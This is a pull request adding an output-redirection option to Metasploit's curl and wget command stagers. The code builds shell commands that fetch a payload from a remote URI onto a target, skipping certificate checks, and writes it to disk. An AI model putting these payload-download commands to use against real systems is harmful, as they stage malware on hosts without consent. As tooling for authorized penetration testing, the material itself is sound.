### PR TITLE
Add stdout redirection to curl and wget stagers

### DIFF
--- a/lib/rex/exploitation/cmdstager/curl.rb
+++ b/lib/rex/exploitation/cmdstager/curl.rb
@@ -25,10 +25,16 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
   def generate_cmds_payload(opts)
     cmds = []
 
-    if opts[:ssl]
-      cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
+    if opts[:redirect]
+      output = "> #{@payload_path}"
     else
-      cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
+      output = "-o #{@payload_path}"
+    end
+
+    if opts[:ssl]
+      cmds << "curl -ks #{opts[:payload_uri]} #{output}"
+    else
+      cmds << "curl -s #{opts[:payload_uri]} #{output}"
     end
 
     cmds

--- a/lib/rex/exploitation/cmdstager/wget.rb
+++ b/lib/rex/exploitation/cmdstager/wget.rb
@@ -26,10 +26,16 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
     cmds = []
     ncc  = '--no-check-certificate'
 
-    if opts[:ssl]
-      cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
+    if opts[:redirect]
+      output = "-O - > #{@payload_path}"
     else
-      cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
+      output = "-O #{@payload_path}"
+    end
+
+    if opts[:ssl]
+      cmds << "wget -q #{ncc} #{opts[:payload_uri]} #{output}"
+    else
+      cmds << "wget -q #{opts[:payload_uri]} #{output}"
     end
 
     cmds


### PR DESCRIPTION
rapid7/metasploit-framework#9780 and other special cases.

- [x] Test `curl` normally
- [x] Test `curl` with redirect
- [x] Test `wget` normally
- [x] Test `wget` with redirect